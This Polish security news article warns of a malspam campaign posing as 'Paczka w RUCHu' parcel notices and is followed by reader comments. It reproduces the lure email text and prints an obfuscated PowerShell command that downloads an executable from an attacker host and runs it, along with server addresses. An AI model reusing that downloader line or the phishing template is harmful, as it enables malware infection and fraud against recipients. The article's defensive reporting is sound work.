14.05.2017 | 21:46

Adam Haertle

Uwaga na wiadomość od „Paczka w RUCHu” która czeka w Waszej skrzynce

Przez cały weekend trwała wysyłka wiadomości ze złośliwym oprogramowaniem podszywających się pod serwis Paczka w RUCHu. To pierwszy zaobserwowany przez nas przypadek użycia tej marki, a i załącznik jest odrobinę inny.

Czasem widzimy kampanie oszustów, które trwają kilka dni pod rząd, podczas których rozsyłana jest taka sama wiadomość. Kampanie te magicznie kończą się gdy je opiszemy – zatem czas chyba zamknąć kolejną z nich.

„Zawsze po drodze”. Paczka w RUCHu – historia drogi jednej Paczki

Najnowsza kampania opiera się na podobnych założeniach jak wiele wcześniejszych, jednak jest kilka szczegółów odróżniających ją od poprzednich. Wiadomość email jest oparta na prawdziwym powiadomieniu od Paczki w RUCHu i wygląda następująco:

Treść to:

Jest! Twoja paczka o numerze 21000555664552 po podróży dotarła prosto od nadawcy do wybranego przez Ciebie punktu prowadzącego usługę „Paczka w RUCHu”. Teraz czeka aż wybierzesz dogodną dla siebie porę i ją odbierzesz.
Kod odbioru: 69***1
Pełny kod odbioru, oraz numer przesyłki znajdziesz w załączonym liście przewozowym.
Kod pozwalający otworzyć list: CYeTnbeP9
Pamiętaj, że przesyłka będzie czekać na Ciebie przez 5 dni. Odbierz ją jak najszybciej i ciesz się już dziś z zakupów.

Co ciekawe, w próbkach z 12. maja znajdowały się także fragmentaryczne dane osobowe odbiorcy, prawdopodobnie pochodzące z jakiegoś wycieku. Przestępca usunął fragment kodu odbioru i dodał informację, że pełny kod odbioru znajduje się w załączniku. W załączniku znajdziemy zatem plik

12-05-2017 Paczka w RUCHu - List przewozowy.7z

zabezpieczony hasłem CYeTnbeP9. W środku znajduje się plik

12-05-2017 Paczka w RUCHu - List przewozowy.wsf

który jest programem w jezyku VBScript, wywołującym polecenia PowerShella, z których najistotniejsze wygląda tak:

SET-cOnTEnt-VAlUe (nEW-obJEcT SyStEm.nET.weBCliENt).dowNLOaDdaTA(http://ssd4.pdns.cz/1500/s500.exe) -EncoDING ByTe-pAth $Env:appdaTa\kw23.exe;  StaRt-PROCESs $EnV:ApPdatA\kw23.exe

Wcześniejsza, rozsyłana od 12 maja wersja łączyła się do serwera pod domeną

http://walesa.pdns.download/

Pod oboma adresami kryje się ten sam serwer 149.56.201.93, który obsługiwał ostatnio kampanie z fałszywą fakturą Playa oraz fałszywym wyciągiem z PKO BP.  Z kolei spam rozsyłany jest z serwera 185.145.44.11, gdzie uruchomiona była usługa C&C bota rozsyłanego wraz z rzekomym wyciągiem PKO BP. Oczywiście do wysyłki spamu wykorzystywany jest także serwer znajdujący się w firmie Nazwa.pl (77.55.1.202). Poniżej kilka linków do VT dla chętnych do dalszego śledztwa.

Jak zatem widać, autor kampanii się nie poddaje i nadal eksploatuje sprawdzone techniki. Czekamy na kolejne próbki.

Dziękujemy osobom, które podesłały nam swoje próbki.

Powrót

Komentarze

  • 2017.05.14 22:37 Fredi

    Sir Thomas? :)

    Odpowiedz
    • 2017.05.14 22:37 Adam

      Któż by inny!

      Odpowiedz
    • 2017.05.15 02:03 Cracked Brain

      Dlaczego „Sir”?
      Bardziej pasowałoby „wieśniak”.
      Wieśniak-Thomas który w końcu będzie złapany i który w więzieniu będzie robił lody swoim kolegom spod celi.
      .
      Thomas, wieśniaku! Nie złości cię że wszyscy się śmieją z ciebie i z twoich amatorskich, do bólu przewidywalnych kampanii na poziomie szkoły specjalnej dla matołków? Ha ha ha ha ha!

      Odpowiedz
      • 2017.05.15 07:46 Gajwer

        Śmieją się tylko ludzie jakoś zapoznani z tematem. Pisiomas pewnie zarobił jednak trochę kasy na tej zabawie i może czuć się dumny. Prawdziwy haker

        Odpowiedz
      • 2017.05.15 08:56 maslan

        ser tomas ;) coś jak limburger z motomyszy z marsa XD

        Odpowiedz
      • 2017.05.15 21:42 Fredi

        Ale poszło „mięso” :). Jezu, Ty na prawdę nie lubisz tego gościa…

        Odpowiedz
  • 2017.05.14 23:02 cotyp

    ukraincy nie poddaja sie, dalej kosza polakow z hajsow na kontach bankowych.

    Odpowiedz
  • 2017.05.14 23:13 100% Arki we Wrzeszczu.

    Nie bardzo rozumiem. IP nalezy do OVH, jest znane z wielu innych kampanii. Dlaczego nie moze zostac ubite?

    Odpowiedz
  • 2017.05.15 08:53 maslan

    Niezłe tempo. Otwieram pocztę – widzę „paczka w ruchu” – badam maila, wychodzi że kolejna kampania od tego kut**** co zwykle. Ale zanim zgłosiłem do z3s to już widzę że jest artykuł <3

    Odpowiedz
  • 2017.05.15 09:02 dam

    jak usunac zmiany wprowadzone przez otworzenie pliku ?

    Odpowiedz
    • 2017.05.15 12:27 Duży Pies

      1) Wyłączyć komputer.
      2) Zbootować go AV poprzez LiveCD/LiveUSB – polecam Dr.Weba albo Kasperskiego – i przeskanować komputer i wszystkie dyski/napędy/udziały/chmury które były do niego podpięte podczas prawdopodobnej infekcji.
      3) Jeśli AV wykryje złośliwy kod, należy pozwolić mu go usunąć.
      .
      To powinno pomóc na teraz.
      A na przyszłość – należy robić backup ważnych danych na takie sytuacje. Można dodatkowo wykonać obraz dysku na którym pracujesz na co dzień.

      Odpowiedz
      • 2017.05.15 16:40 M_M

        A jak to się może zachować jeśli było otwarte na iPadzie? Mogło zainfekować urządzenie z pominięciem niezbędnej autoryzacji w środowisku macowskim? Czy mogło zainfekować inne urządzenia, które np. były w tym czasie na tym samym wifi domowym aktywnie podłączone do sieci? Wybaczcie, jestem ignorantem. Dzięki.

        Odpowiedz
    • 2017.05.15 13:29 Monter

      Lobotomia.

      Odpowiedz
      • 2017.05.15 16:13 Duży Pies

        A wiesz że lobotomia wróciła i pomaga nie szkodząc jednocześnie?
        Oczywiście, nie jak kiedyś przez szpikulec do lodu – dziś jest przeprowadzana poprzez wypalanie promieniem lasera. Nawiercasz czaszkę i precyzyjnie wypalasz pojedyncze mikronowe obszary. Pomaga!
        .
        Tak samo wróciły elektrowstrząsy – potrafią leczyć niektóre odmiany nieleczalnej farmakologicznie depresji. Bo depresja nie zawsze jest spowodowana traumą lub negatywnymi emocjami – czasami po prostu mózg neurologicznie niedomaga.
        .
        Dla zainteresowanych możliwościami ludzkiego mózgu polecam prace nieżyjącego już wielkiego uczonego, prof. Manczarskiego (pracował na WAT), który w latach ’60 prowadził doświadczenia nad elektrohipnozą i spostrzeganiem pozazmysłowym w hipnozie. Fascynujące!

        Odpowiedz
  • 2017.05.15 10:57 Mat

    Jak cofnąć zmiany po odpaleniu tego pliku? co on zmienia w systemie?

    Odpowiedz
    • 2017.05.15 16:45 Wujek Pawel

      Nawet moja 60 letnia matka nie klika w co popadnie…

      Odpowiedz
    • 2017.05.15 16:46 ...

      Tak jak monter wspomniał, lobotomia

      Odpowiedz
  • 2017.05.15 21:34 Dyrektor Dominik,

    Wzywamy autora kampanii o zaprzestanie tego typu działalności. Takie zachowania źle rzutują na pion cyberprzestępczości policji. Z poważaniem dyr. Dominik oraz Łukasz (łapiący przestępców za torami :D)

    Odpowiedz
    • 2017.05.16 13:23 root

      WOW, to nasza policja łapie za torami? To prawie jak SOK :)

      Odpowiedz
  • 2017.05.25 00:16 KUba

    Od kilku dni na 2 kontach mejlowych widziałem takie wiadomości, ale nie otwierałem, bo wiedziałem że nie zamawiałem. Wchodzę na ZTS i jest wytłumaczenie. Pozdrawiam

    Odpowiedz

Zostaw odpowiedź do Fredi

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Uwaga na wiadomość od „Paczka w RUCHu” która czeka w Waszej skrzynce

Komentarze